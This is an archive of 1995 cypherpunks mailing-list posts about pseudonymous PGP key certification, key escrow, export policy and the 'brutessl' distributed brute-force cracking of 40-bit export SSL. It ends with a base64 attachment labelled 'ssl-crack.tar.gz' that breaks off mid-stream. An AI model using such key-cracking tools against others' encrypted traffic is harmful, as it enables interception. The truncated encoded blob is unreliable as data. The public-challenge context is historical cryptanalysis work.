2) Policy-vs-Mechanism - Realistically, there'll be software out there
that wants an Official CA-approved certificate to talk to anyone.
If nobody's willing to give certificates to nyms, then nyms can't participate.

3) What's your definition of "prohibit"?  If you mean "Keys.com decides
not to offer the service", they lose the cash they might have made
selling certificates to nyms, lose some customer goodwill, but maybe gain
an improved reputation in other parts of the market, and JohnDoe can
always go to Nyms-R-Us.org and register as JohnDoe32767.
If you mean "the government should ban it", I've done enough anarchist ranting
about how that sort of thing degrades society :-)
However, if you mean "The Certificate Authority Cabal should agree not to
offer any certificates without real ID and contractually forbid lower-level
certifiers to do it either", well, it's a sad thing for society,
but they can do it if they want.  You lose the ability to participate as a nym,
you lose privacy, you lose the value that you might have gained by
transactions with people who wanted to retain their anonymity.

RSA does offer personna certificates to unauthenticated people.
(Also see my follow-on message about my offer to sign PGP keys for nyms.)

4) Are there negatives about dealing with unattributable pseudonyms?  Of course.
But you don't have to deal with them, and there will be CAs who don't,
and services that refuse to deal with unauthenticated pseudonyms,
just as there are on-line services like the Well that allow "unlisted"
identifications but do keep track of true names for their users.
It would be nice if certification authorities did indicate how much trust
they have in the identity of a given key's owner, but markets will take
care of that.


                Thanks;  Bill Stewart
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 16:46:51 PDT
To: cypherpunks@toad.com
Subject: PGP Certification Service for Pseudonyms
Message-ID: <199508182342.QAA20975@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Time to stretch some paradigms :-)
I've decided to offer a service of certifying PGP keys for Pseudonyms.
Normally, it only makes sense to sign PGP keys for people you can
trust to really be who they say they are, but this means you can't
sign keys for people who want to use pseudonyms, which would be a Good Thing.
To try and retain a certain amount of trust in the process,
here's my policy for doing so:

0) I only sign pseudonyms with the psuedonym-signing key below,
which tries to make it clear how trustable it isn't..
1) First Come, First Served - The first user of a given name gets it,
and the only guarantee I'll make about verification is that I won't
sign more than one key with the same name unless the later key is signed
by the earlier key.
2) At least for now, keys need to  indicate pseudonymity in the name.
3) If you're using a name I recognize, I might check it out with the
person I know who uses that name.  
3A) If you're claiming to be L.Detweiler, I'll want a fax of your ID :-)

Procedures:
1) Requests by email; I will mail a copy of the key to the keyserver
and to the address you sent the request from if I can.
2) Price is 1 Digicash e$, or 1 Tacky Token, or a big prime number,
or an interesting cypherpunk-related URL (well-known sites only count
if it's something new.  New code is always interesting!)
3) I'll post interesting payments to http://idiom.com/~wcs/ ,
and if it's something that takes a while to verify (e.g. I haven't
gotten my free stuff from digicash.com yet :-) and your payment bounces,
I'll probably post that too :-)
        Pseudonym John Doe sent me a composite number 897098274398742!

                                        Enjoy!   
                                               Bill 


############################################################################
1024/B57ECBC5 1995/08/18 
Bill Stewart Unauthenticated Pseudonym Signing Key <stewarts@ix.netcom.com>
PGP-Fingerprint: 70 96 C9 B8 38 05 61 0C  A5 30 D0 82 7A 74 16 15
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7.1

mQCNAzA1FMYAAAEEAKW0NWw3NyyFSuo1tQRbK8hBQDJ8Kdi0VlNqJrxKYcdbMMsW
3Mcy9aqU9Z2o4ZzqFGWVVgXARwBzIK996yL+6tNPeVZQeDa64gmuTc12oYhfocjt
AhEv6+f/oEYBiKjhSfoVVuoe8sudFH2e1Q5wjpd8LGZux15gN/nzJsm1fsvFAAUR
tEtCaWxsIFN0ZXdhcnQgVW5hdXRoZW50aWNhdGVkIFBzZXVkb255bSBTaWduaW5n
IEtleSA8c3Rld2FydHNAaXgubmV0Y29tLmNvbT6JAJQDBRAwNRcy+fMmybV+y8UB
AaYjA/iyfRbaYmNrlH81Pig/3c9Co2pPXWXJW4MES/5syRvebZEmbWaXFKpIwXh6
OBT1oKZtN8WfGxENyWcXyyoiOaRR/9tt3c3VqJ98oAgJcB9W217q4NGWiG2X6mlB
IQYZ8Lcdl6aX2pftHGbFZ0AR45RKYcIdQOPVC87NLzJYEDxkiQBVAwUQMDUXFHB8
FQG9p6e1AQF/BQH+JROoAsFoo9CmzUfP2c8w8OqfNSlGkZ6gHRsJ6zgzXkJJwQ89
gJcK9HkIFPgec1/HiTmRtLWrqeDB9WVzorTnMokBFQMFEDA1Fi6IHBX3yeGy8QEB
GdAH/RknVXw5UDCkEXXrrLUyNBvDpokBb7rarpJQ1SXB+YvvfcMDyotUTyhb5QZi
LWOi8OrSeUD0l/LyJjQ01ejMUC3Y5z4KVyKel4E+3CwMWkuJpkoe0AkQ3TUfXqtd
AM7H2kC13hXrprQKOAMJMArcHxocP9GkIRKx7URDM7vE6lmaXYEd6i5uFICNNFNM
MggRfVTCr8RecP+kAWvbFJQ3ET2/ctP/wzb2uJoXlzFTebAMlh32d4UrQyo2iE1h
qSF6G+GKYbtl61OJU0FySAPPV2bO5xVqgsySm9mmjEs7W2l3gyddMallbnE5vFJr
0xSOd/9ZKNfq+0Cxdy7KuW3PobY=
=OBBP
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQBVAwUBMDUk2fthU5e7emAFAQEqZwH/ZOGPWCOldIsueBZWbmSAEGcXoUlXqJNS
8DoFNO0W1qs7+2kcKxM55UahdcOdaJe/lTbtf2PLgRmEzkV2mYLSyw==
=kpgd
-----END PGP SIGNATURE-----
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 18 Aug 95 09:08:43 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: Where is the key cracking farming software?
Message-ID: <14470.9508181605@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey <dan@milliways.org> writes on cpunks:
> There must be several versions of the code at this point.  The
> Cypherpunks release, Damien's release and whoever else wrote some code
> to do the chore.  If someone could pass me a pointer to the version
> that's best-commented and most understandable (one man's C is another
> man's crypto) I'd like to port it to Windows NT and write a simple
> installation to install it as a service.

Yep there's lots of versions of the brutessl software, ones I know of
(in no particular order):

- Damien Doligez wrote one
- Andrew Roos wrote on (this is the one we're using for the challenge)
- Eric Young wrote one
- I wrote one

More related softwares, specifications etc.

- Piete Brookes, Andy Brown, and I wrote a protocol specification for
  a SMTP style key doler - SKSP (Simple Key Search Protocol) - draft
  RFC like document on brute (www url below).

- Piete wrote a unix socket based key server and client for generic
  unix machines (in perl).

- Andy Brown wrote a Windows NT client which talks the same protocol

- David Byers did a MasPar port of the brutessl code

> 	Perhaps a general-purpose OO bruteforcing library (addition to
> Crypto++?) would be a good idea.  Just pass a pointers to the
> encrypt() and decrypt() functions to use for this session to the
> Cracker object, which in turn takes a number of bits and starts
> cracking.:)

The socket based key distributer allows you to write clients which
interact with the key server.  Take a look at Andy's code.

> 	The problem with this is the disparity among out-of-the-box encrypt
> and decrypt functions.  But I suppose it's nothing that couldn't be
> overcome with wrapper functions.  Just thinking out loud. :)

Not sure how Andy addresses this in the NT code (I don't have NT), but
for the unix client you'd just get another brute force program,
compile it and update the client.

Piete has a WWW URL for the software (the protocol spec is there too) at:

	http://www.brute.cl.cam.ac.uk/brute/

(Brute is a subsubdomain he set up for the purpose).

Also this:

	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/

should work.

And the socket server runs on: sksp.brute.cl.cam.ac.uk (port 19957).

I think we're ready to start another challenge, this one a
collaborative project like the brute rc4 one.  Just need some
challenges now (asked Hal about this).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 17:13:57 PDT
To: cypherpunks@toad.com
Subject: Re: PGP Certification Service for Pseudonyms
Message-ID: <199508190011.RAA26902@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In my announcement about Pseudonym Signing Service, I forgot to type Rule 4)
4) Any messages requesting signatures for keys must be signed by the key
requesting the signature (both the key and the email message need to be
signed...)

                Thanks;  Bill
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 18 Aug 95 15:21:38 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Export policy change
Message-ID: <9508182218.AA04527@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  I will cheerfully escrow keys for 1$ ecash/key. Please be advised,
>  however, that key storage will be on an old 40M RLL drive on an
>  8088 machine, so retrieval may be a bit slow and unreliable.......

hey, my escrow service will store your keys on modern equipment...  Plus, I  
don't care you encrypt your key (with still-legal, non-exportable,  
escrow-free, strong-crypto) before you escrow it.  :-)

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 18 Aug 95 14:24:04 PDT
To: Childers James <ic58@jove.acs.unt.edu>
Subject: Re: Cypherpunks' ideal escrow agent
Message-ID: <199508182122.RAA54557@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James Childers <ic58@jove.acs.unt.edu> wrote:

>I've seen the idea of voluntary key escrow discussed before on this list. 
>(And no, not the government's idea of "voluntary", either.) A question I 
>would raise is this: What would be the ideal setup for an escrow agency? 
>If I were to open up an agency for business, what would be some 
>characteristics you would look for?

Exactly what the government *doesn't* want, I'm afraid...
I would want them to honor *only* warrants which involve
crimes dealing with at least the possibility of an
individual, articulable victim.

Despite much hot wind about "terrorism" from the FBI to
the contrary, the reason for "GAK" [I liked "FUCKED" better]
is to allow prosecuting the tax-and-spend drug war
to remain possible.

Also, the temptation to ignore any warrant requirement and
screen *political* e-mail if a "minor" political party started
to gain prominence would be nearly overwhelming to any non-angels
with "real-time" decryption capability. Political debates these
days are (obviously) won by sound bite, and advisors want to be
prepared for a sound "byte" such as "tax-and-spend drug war"
[Oops, can't use that one now!] :) flying through cyberspace
toward an opponent, just as Reagan was (supposedly) prepared
for Carter's lines before their debates.
<zipping up my Nomex bodysuit now...>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDUDZ21lp8bpvW01AQFx0wP/b5c5xTxyGygbTcRJriErK9dD0ahfFXEu
SSpqmExn+E+aD6tYNQNEDS50pnT8wOI7IKQjVLGGEZKfmeZRIU7gnT0jttbHV14c
QnMGkMsEsVK3R2YkWPGavhPeJwdrwHrvYC/xUFzrtSJHQQ1u7X3LXubjS2vikcVJ
mxqfYoUympA=
=YEMs
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 14:39:51 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape security
In-Reply-To: <412tij$704@flop.mcom.com>
Message-ID: <9508182133.AA03147@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| > >        There is no word as to how to become a KSA.  Netscpe has
| > >ignored the question on several occaisons.
| > 
| > I'm fairly sure that I remember Taher saying at the W3C security
| > meeting that they intend to do this, and that hardcoding the CA's
| > into the library was as quick hack.  I also have the impression
| > that they don't know how to do it, but my recollection is fuzzier there.
| 
|   It has been stated publicly several times that we do plan to allow
| user configurable certificate authority and server trust.  A user
| will be able to configure their browser to talk to servers that have
| certificates signed by any CA they choose to trust.

	But I think I can work cheaper than Verisign.  What do I have
to do to get set up as a KCA today?


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 18 Aug 95 17:40:54 PDT
To: CYPHERPUNKS@toad.com
Subject: Strong encryption for credit cards only
Message-ID: <8AF6450.000300033A.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


H > There are many aspects to privacy beyond credit card numbers.  The bottom


      "Jane goes to dance class Wednesdays from 4:30 to 5:30. And since
     Madame Sophia's School of Dance is just a few blocks away from
     Johnson Elementary, she can walk."

tells that pedophile (and we know that the Internet is just =filled=
with them, thanks to Marty Rimm's Definitive Study on the subject)
exactly where he can lie in wait for his next victim. We need strong
crypto to protect The Children!<tm> from such threats. Hillary and the
rest of the Children's Defense Fund-amentalists should be in the
vanguard of this Just Cause.


 * Encrypted just to pixx off Louis Freeh: mQCNAiqxEn0AAAEEAM0fi4K4+iXI9fV0fz0n
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 18 Aug 95 16:38:02 PDT
To: cypherpunks@toad.com
Subject: Re: WhiSSLing in the Dark
Message-ID: <v01510104ac5ae1440aac@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


David R. Conrad wrote:
>>Netscape Encrypted Data Cracked
>>
>>Tokyo, Japan, Aug. 18 (NB) -- ...
>>
>>Many companies working on secure transaction systems hope
>>the much more secure 128-bit code version of the system
>>will be available for export eventually. This is said to
>>be almost unbreakable, requiring a trillion times more
>>processing power to crack than the 40-bit version.  ...
>
>Notice how the "over a trillion times more" has devolved into simply "a
>trillion times more" -- and we all know that the former statement was a
>gross underestimate, reminiscent of the claim of "over 3 billion
>combinations" on Ideal's packaging for Rubik's cube.
>
>Of course the real reason the media have standardized on trillian for
>this is that they know it is the biggest number the bulk of their
>audience is familiar with, and that if they said 3e26 or even "three
>times ten to the twenty-sixth power" they would snow most of their
>readers/viewers.  (To be fair, I think the WSJ did say 10^26, with a
>brief explanation of what that meant.  I congratulate them for not
>"talking down" to their readers.)

I talked the guy out of using an analogy with physical key length (the kind
you stick in a door) and he settled on "10^26" rather than a power of 2.
Also, I gave hime the relevant names, e-mail addresses, and URL's, but
didn't have any phone numbers.

BTW, in the "cryptography experts and hackers and mathematicians" as well
as the whole "hacker" slant, smells like an editor.


Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    | E-mail:  RedPlanet@redweb.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Fri, 18 Aug 95 09:54:56 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Where is the key cracking farming software?
In-Reply-To: <14470.9508181605@exe.dcs.exeter.ac.uk>
Message-ID: <199508181654.SAA10686@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| Yep there's lots of versions of the brutessl software, ones I know of
| (in no particular order):
| 
| - Damien Doligez wrote one
| - Andrew Roos wrote on (this is the one we're using for the challenge)
| - Eric Young wrote one
| - I wrote one

| I think we're ready to start another challenge, this one a
| collaborative project like the brute rc4 one.  Just need some
| challenges now (asked Hal about this).

I think it is time this kind of software is outlawed! I mean, it is a 
criminal instrument, and the only good it does is to embarrase good
old well-meaning companies trying to make a profit. Besides, the 
customers should know better than to buy stuff over the net! And Netscape
said AS IS all the time, didn't they?

(Just joking! :-))

But seriously, I wonder how long it will take before bruteXXX programs 
will be classified as "criminal instruments"? As well as real good 
random generators, I guess? (I don't think they will outlaw the XOR
op, so to get rid of one-time-pads they have to go for the random gen...)

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <grue!blane@eskinews.eskimo.com>
Date: Fri, 18 Aug 95 20:29:55 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Where is the key cracking farming software?
In-Reply-To: <199508180611.CAA11918@bb.hks.net>
Message-ID: <Pine.LNX.3.91.950818185344.11301A-101000@guetech.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3932.1071713491.multipart/mixed"

--Boundary..3932.1071713491.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Fri, 18 Aug 1995, Lucky Green wrote:

> With all the talk about cracking SSL, where is the cracking software?
> Sombody just offered me a six Pentium workstation, if I agree to give it a
> "real workout". I'd like to be able to say: "Sure, will do."

  Here's a copy of everything from the webpage explaining the crack.

   Brian

-----------------------------------------------------------------------------
"A little rebellion now and then is a good thing."   |   PGP Key and .plan
 -- President Thomas Jefferson                       | email Subj: blane-info
=============================================================================


--Boundary..3932.1071713491.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "ssl-crack.tar.gz"

H4sICN6bMzAAA3NzbC1jcmFjay50YXIA7FtZkxs3kvYzfgVGEWt3x/DoQ4ct
U4ylyGqTo+5mD0mNwnYoFCALJGu6WEXX0Ydif/zmAaBQJNvWhOV9Wj9YTVYB
SOTx5ZcJcDq9bK2LTfzNX/iflPLlyYn8Rr48Oz99JfGzfPmc/5Vn5y9fPH+B
b5w+f3V6fnYKf8sXL168+kb+lTL9/3/8X2c4u7rsis5sNLsMurO1ltPppbzJ
0iJdpHGnzd+Lztvx4Oeu7Pyt2ZTtRN/nmV62o41a6dx+/DRftVbRUjabXSFE
px9cz4IJ/NnpyeEkuHjzrB0loX4gb3sGM46ufpLTSf/NMzNNXqgkVFmYf5qr
BGd6Jj+MBrPhm+cvv5fDYPTTcPbm/Ey+HU8GweTNSbfT7uHswzOY62J8PZPT
0S/Bm7+fd2edNn7uDoOdB7Qz83Ayno3740vRadMEbSeu6NzA/0dL+ZiWcq3u
tPyt1HkRpUku1TwtC1mso1zmW72IltFC4ROZZvI+LeNQxtGtlkUqc52EsswF
TJLJRbrZ6KTI5TbWKtf8UG9UFOOrHSXXoL43+LlIX+d53CxUfPvfiS7yhdrq
FgzvHvy201bdlhQ/g6ALlci8nOeLLJqTACQkThklK5AqL+T8kRbGz25t8cTi
zUzTrg8LcfApCiPBgnJbFgUuUoAv3adZKJ915l0nW6c97z6TUUIiaingwb/1
ogARE41qxC/nafgo0yX9vdF5Du4B20S7WP/cGv8EA+VyrjVtfhMVhQ6lmXkU
zC4kPAXFdJSgTT5bpdu1zl6322HeAhF0lkSLFmzi9auT9slJm7/SRTPM1LLI
2/RPcx0tbjcqadrNNgXq4eS0VTwUz7qdt92RGSYG+H6n/bbLhrk2AyRYQi2K
6E7Hj6CdLC+teqzLR5+NGy1pd/cRWC8R+MYyUxsNWry1+qBtuVBBRSxAQ6R4
XCbOU1T6La6A04CmwzIvskexAAdOsyIqN3KVpeU2R0XpJC8z8Je1KmS6BTXS
PLgf+JSpeYzOuiizqHisFhX6Af0pSe/N6yTYsixgqpY0kXMwHKpQarigEGD0
vNxuQTYZwkqkmqjamR8zLmR6giHFuq0VreaRz7qHv0fgaHGYOxOhH4UaLAT7
DslnHGpZtMuLsA2Whz8NhKGp4JPOdLIAI29AUtwRmRLXgKCMYx0KeG8Cg+SH
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
